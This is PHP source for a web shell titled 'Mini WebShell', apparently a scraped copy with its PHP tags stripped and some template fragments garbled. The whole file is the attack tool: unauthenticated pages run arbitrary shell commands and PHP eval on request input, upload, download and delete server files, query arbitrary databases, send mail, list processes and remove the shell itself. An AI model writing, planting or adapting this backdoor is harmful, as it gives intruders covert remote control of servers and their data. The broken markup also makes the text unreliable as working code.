// Enable full error reporting
ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(E_ALL);
session_start();
// Routing
$pages = array(
'sysinfo','whois','traceroute','files','search','upload',
'cmd','eval','sql','mailers','calc','tools','proc',
'selfremove','logout'
);
$page = (isset($_GET['page']) && in_array($_GET['page'],$pages))
? $_GET['page']
: 'sysinfo';
// Helpers
function humanSize($bytes) {
$units = array('B','KB','MB','GB','TB');
$i = 0;
while ($bytes > 1024 && $i < count($units)-1) {
$bytes /= 1024; $i++;
}
return round($bytes,2).' '.$units[$i];
}
function esc($s) {
return htmlspecialchars($s,ENT_QUOTES,'UTF-8');
}
function isWindows() {
return strtoupper(substr(PHP_OS,0,3))==='WIN';
}
<!DOCTYPE html>
<html lang="en">
<meta charset="UTF-8">
Mini WebShell<title>Mini WebShell</title>
<style>
body{margin:0;font-family:Arial,sans-serif;background:#f4f4f4;color:#333;}
.navbar{background:#444;padding:5px;display:flex;flex-wrap:wrap;}
.navbar a{color:#ddd;margin:2px 5px;padding:5px 8px;text-decoration:none;border-radius:3px;}
.navbar a.active,.navbar a:hover{background:#666;color:#fff;}
.content{padding:15px;}
table{width:100%;border-collapse:collapse;margin:10px 0;}
th,td{padding:8px;border-bottom:1px solid #ccc;text-align:left;}
form,ul{margin:10px 0;}
input,textarea,select,button{padding:5px;margin:3px 0;max-width:400px;width:100%;}
pre{background:#222;color:#0f0;padding:10px;overflow:auto;}
.msg{padding:10px;background:#eef;border:1px solid #ccd;margin:10px 0;}
</style>
<div class="navbar">
foreach($pages as $p):
<a href="?page= echo $p" class=" echo $p===$page?'active':''">
echo strtoupper($p)
</a>
endforeach
</div>
<div class="content">
switch($page):
// SYSTEM INFO
case 'sysinfo':
$info = array(
'OS' => Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64,
'User' => get_current_user(),
'Disk Total' => humanSize(disk_total_space(__DIR__)),
'Disk Free' => humanSize(disk_free_space(__DIR__)),
'Server' => $_SERVER['SERVER_SOFTWARE'],
'PHP Version' => phpversion(),
'Safe Mode' => ini_get('safe_mode')?'ON':'OFF',
'Open Basedir' => ini_get('open_basedir')?:'NONE',
'cURL' => function_exists('curl_version')?'YES':'NO',
);
echo '';
foreach($info as $k=>$v){
echo '<th>'.esc($k).'</th>| '.esc($v).' |
';
}
echo '
';
break;
// WHOIS
case 'whois':
if(!empty($_POST['host'])){
echo '<pre>'.shell_exec('whois '.escapeshellarg($_POST['host'])).'</pre>';
}
echo '';
break;
// TRACEROUTE
case 'traceroute':
$bin = isWindows()?'tracert':'traceroute';
if(!empty($_POST['host'])){
echo '<pre>'.shell_exec($bin.' '.escapeshellarg($_POST['host'])).'</pre>';
}
echo '';
break;
// FILE MANAGER
case 'files':
if(!empty($_GET['action']) && !empty($_GET['file'])){
$f = basename($_GET['file']);
if($_GET['action']==='delete'){
unlink($f);
echo '<div class="msg">Deleted '.esc($f).'</div>';
}
if($_GET['action']==='download'){
header('Content-Disposition: attachment; filename="'.$f.'"');
readfile($f); exit;
}
}
$list = scandir('.');
echo '<ul>';
foreach($list as $f){
if(in_array($f,array('.','..'))) continue;
echo '<li>'.esc($f)
.' [<a href="?page=files&action=download&file='.urlencode($f).'">DL</a>]'
.' [<a href="?page=files&action=delete&file='.urlencode($f).'" onclick="return confirm(\'Delete?\')">DEL</a>]'
.'</li>';
}
echo '</ul>';
break;
// SEARCH
case 'search':
if(!empty($_POST['q'])){
echo '<pre>'.shell_exec('grep -Rn '.escapeshellarg($_POST['q']).' .').'</pre>';
}
echo '';
break;
// UPLOAD
case 'upload':
if(!empty($_FILES['up'])){
$ok = move_uploaded_file($_FILES['up']['tmp_name'],basename($_FILES['up']['name']));
echo '<div class="msg">Upload '.($ok?'OK':'Failed').'</div>';
}
echo '';
break;
// COMMAND SHELL
case 'cmd':
if(!empty($_POST['cmd'])){
$out = shell_exec(escapeshellcmd($_POST['cmd']).' 2>&1');
echo '<pre>'.esc($out).'</pre>';
}
echo '';
break;
// EVAL
case 'eval':
if(!empty($_POST['code'])){
echo '<pre>'; eval($_POST['code']); echo '</pre>';
}
echo '';
break;
// SQL
case 'sql':
if(!empty($_POST['host'])){
$h=$_POST['host']; $u=$_POST['user']; $p=$_POST['pass']; $db=$_POST['db']; $q=$_POST['query'];
$m=new mysqli($h,$u,$p,$db);
if($m->connect_error){
echo '<div class="msg">Connect Error '.esc($m->connect_error).'</div>';
} else {
if($res=$m->query($q)){
if($res===true){
echo '<div class="msg">Query OK</div>';
} else {
echo '<table border=1 cellpadding=5>';
while($col=$res->fetch_field()){
echo '<th>'.esc($col->name).'</th>';
}
echo '
';
while($row=$res->fetch_assoc()){
echo '';
foreach($row as $v) echo ''.esc($v).' | ';
echo '
';
}
echo '';
}
} else {
echo '<div class="msg">Error '.esc($m->error).'</div>';
}
$m->close();
}
}
echo '';
break;
// MAILERS
case 'mailers':
if(!empty($_POST['to'])){
$ok=mail($_POST['to'],'Test','This is a test');
echo '<div class="msg">Mail '.($ok?'sent':'failed').'</div>';
}
echo '';
break;
// CALC
case 'calc':
if(!empty($_POST['expr'])){
$r = @eval('return '. $_POST['expr'] . ';');
echo '<div class="msg">Result: '.esc($r).'</div>';
}
echo '';
break;
// TOOLS (PING)
case 'tools':
if(!empty($_POST['host'])){
$c = isWindows() ? 'ping -n 4':'ping -c 4';
echo '<pre>'.shell_exec($c.' '.escapeshellarg($_POST['host'])).'</pre>';
}
echo '';
break;
// PROCESS LIST
case 'proc':
$cmd = isWindows()?'tasklist':'ps aux';
echo '<pre>'.shell_exec($cmd).'</pre>';
break;
// SELF REMOVE
case 'selfremove':
if(!empty($_POST['confirm'])){
unlink(__FILE__); exit('Removed');
}
echo '';
break;
// LOGOUT
case 'logout':
session_destroy();
header('Location:?page=sysinfo');
exit;
endswitch;
</div>